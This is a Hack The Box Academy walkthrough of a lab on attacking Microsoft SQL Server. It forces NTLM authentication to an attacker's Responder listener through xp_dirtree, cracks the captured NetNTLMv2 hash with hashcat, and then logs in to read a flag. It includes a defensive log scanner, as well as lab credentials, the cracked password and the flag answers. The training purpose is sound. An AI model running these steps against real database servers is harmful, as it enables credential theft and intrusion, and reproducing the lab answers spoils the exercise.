
Attacking SQL Databases

ℹ️ Information

Authenticate to 10.129.203.12 (ACADEMY-ATTCOMSVC-WIN-02) with user htbdbuser and password MSSQLAccess01!

Question

What is the password for the "mssqlsvc" user?

📋 Walkthrough

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ impacket-mssqlclient htbdbuser@10.129.203.12 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(WIN-02\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(WIN-02\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (htbdbuser  guest@master)> show databases;
ERROR(WIN-02\SQLEXPRESS): Line 1: Could not find stored procedure 'show'.
SQL (htbdbuser  guest@master)>
First, we connect to the SQL server with impacket-mssqlclient using the provided credentials. Our attempt to list the databases fails because show databases is MySQL syntax, not T-SQL: SQL Server parses the bare word show as a stored procedure name, hence the "Could not find stored procedure 'show'" error.

On attack machine

sudo responder -I tun0
Next, we start Responder on our attack machine, listening on the tun0 interface, so that it can capture any NTLM authentication the SQL server sends over the network.

Request

SQL (htbdbuser  guest@master)> EXEC master..xp_dirtree '\\10.10.15.53\share\'
subdirectory   depth
We execute the xp_dirtree extended stored procedure with a UNC path pointing at our host. To list that path, the SQL Server service account authenticates to our Responder SMB listener, which records the NetNTLMv2 response.

Response

[SMB] NTLMv2-SSP Client   : 10.129.203.12
[SMB] NTLMv2-SSP Username : WIN-02\mssqlsvc
[SMB] NTLMv2-SSP Hash     : mssqlsvc::WIN-02:00598b5d1b0d91da:<SNIP>
Responder captures the NetNTLMv2 hash of the mssqlsvc account, i.e. the account the SQL Server service runs under.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ echo "mssqlsvc::WIN-02:00598b5d1b0d91da:6A17E1B2780D4FF5BD389053521038A5:010100000000000080D16572B499DB01E3F9784A4CDF5E9B0000000002000800440053003800300001001E00570049004E002D0031004300550052004E004900590054004E0045004F002E0044005300380030002E004C004F00430041004C000300140044005300380030002E004C004F00430041004C000500140044005300380030002E004C004F00430041004C000700080080D16572B499DB0106000400020000000800300030000000000000000000000000300000DC2769331B161770BD2C2A6578996B418ACDE22E93439BC50C8147CCD61CAF4F0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310035002E00350033000000000000000000" > hash
We save the captured hash to a file named hash.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i7-13700KF, 14915/29894 MB (4096 MB allocatable), 24MCU

<SNIP>

MSSQLSVC::WIN-02:00598b5d1b0d91da:6a17e1b2780d4ff5bd389053521038a5:<SNIP>:princess1
We use hashcat in mode 5600 (NetNTLMv2) with the rockyou.txt wordlist to crack the captured hash. The password for the mssqlsvc user is revealed to be princess1.

MSSQLSVC:princess1

Answer

princess1
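The detection side of the xp_dirtree step above, as an added example that is not part of the original walkthrough: a Python scanner over constructed, simplified SQL Server statement-audit lines that flags xp_dirtree, xp_fileexist and xp_subdirs calls whose UNC path points at a host outside an allowlist of expected file servers. The log line format, the sample hostnames and the allowlist are assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample records (not real server output): one flattened line per
# statement, as a SQL Server Audit / Extended Events export might be normalised
# before shipping to a SIEM. The line format and hostnames are assumptions.
SAMPLE_RECORDS = [
    "2024-05-01T10:01:12Z server=WIN-02\\SQLEXPRESS login=sa stmt=SELECT name FROM sys.databases",
    "2024-05-01T10:02:40Z server=WIN-02\\SQLEXPRESS login=htbdbuser stmt=EXEC master..xp_dirtree '\\\\10.10.15.53\\share\\'",
    "2024-05-01T10:03:05Z server=WIN-02\\SQLEXPRESS login=backup_svc stmt=EXEC master..xp_dirtree '\\\\fileserver01.corp.local\\backups\\'",
    "2024-05-01T10:04:19Z server=WIN-02\\SQLEXPRESS login=htbdbuser stmt=EXEC xp_fileexist '\\\\10.10.15.53\\x\\a.txt'",
    "2024-05-01T10:05:00Z server=WIN-02\\SQLEXPRESS login=htbdbuser stmt=SELECT * FROM tb_flag",
]

# Extended procedures that take a path argument; handed a UNC path, they make the
# SQL Server service account authenticate outbound over SMB to that host.
PROC_RE = re.compile(r"\b(xp_dirtree|xp_fileexist|xp_subdirs)\b", re.IGNORECASE)
UNC_HOST_RE = re.compile(r"\\\\([^\\'\"\s]+)")  # host between leading \\ and next \
RECORD_RE = re.compile(r"^(?P<ts>\S+) server=(?P<server>\S+) login=(?P<login>\S+) stmt=(?P<stmt>.*)$")

# File servers this instance legitimately reaches over SMB (assumed allowlist).
ALLOWED_UNC_HOSTS = {"fileserver01.corp.local"}

@dataclass
class Finding:
    ts: str
    login: str
    proc: str
    host: str
    severity: str  # "high": UNC host not on the allowlist; "info": expected host

def analyse(records, allowed_hosts=ALLOWED_UNC_HOSTS):
    """Return one Finding per UNC host passed to a path-taking extended procedure."""
    findings = []
    for rec in records:
        m = RECORD_RE.match(rec)
        if not m:
            continue  # malformed line: skip rather than abort the whole batch
        proc = PROC_RE.search(m["stmt"])
        if not proc:
            continue
        for host in UNC_HOST_RE.findall(m["stmt"]):
            sev = "info" if host.lower() in allowed_hosts else "high"
            findings.append(Finding(m["ts"], m["login"], proc.group(1).lower(), host, sev))
    return findings

if __name__ == "__main__":
    for f in analyse(SAMPLE_RECORDS):
        print(f"[{f.severity}] {f.ts} {f.login} called {f.proc} against \\\\{f.host}")
```

A low-privileged login calling these procedures against an arbitrary IP, as htbdbuser does here, is the pattern to alert on; denying EXECUTE on them to public and blocking outbound SMB from the SQL host removes the path entirely.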

Question

Enumerate the "flagDB" database and submit a flag as your answer.

📋 Walkthrough

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ impacket-mssqlclient MSSQLSVC@10.129.203.12 -windows-auth
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(WIN-02\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(WIN-02\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (WIN-02\mssqlsvc  WINSRV02\mssqlsvc@flagDB)> SELECT table_name FROM flagDB.INFORMATION_SCHEMA.TABLES
table_name   
----------   
tb_flag      


SQL (WIN-02\mssqlsvc  WINSRV02\mssqlsvc@flagDB)> select * from tb_flag;
flagvalue                              
------------------------------------   
b'HTB{!_l0v3_#4$#!n9_4nd_r3$p0nd3r}'   
We connect to the SQL server as mssqlsvc with the cracked password, using -windows-auth because this is a Windows account rather than a SQL login. We then enumerate the tables in the flagDB database through INFORMATION_SCHEMA.TABLES, find a table named tb_flag, and query it to retrieve the flag.

Answer

HTB{!_l0v3_#4$#!n9_4nd_r3$p0nd3r}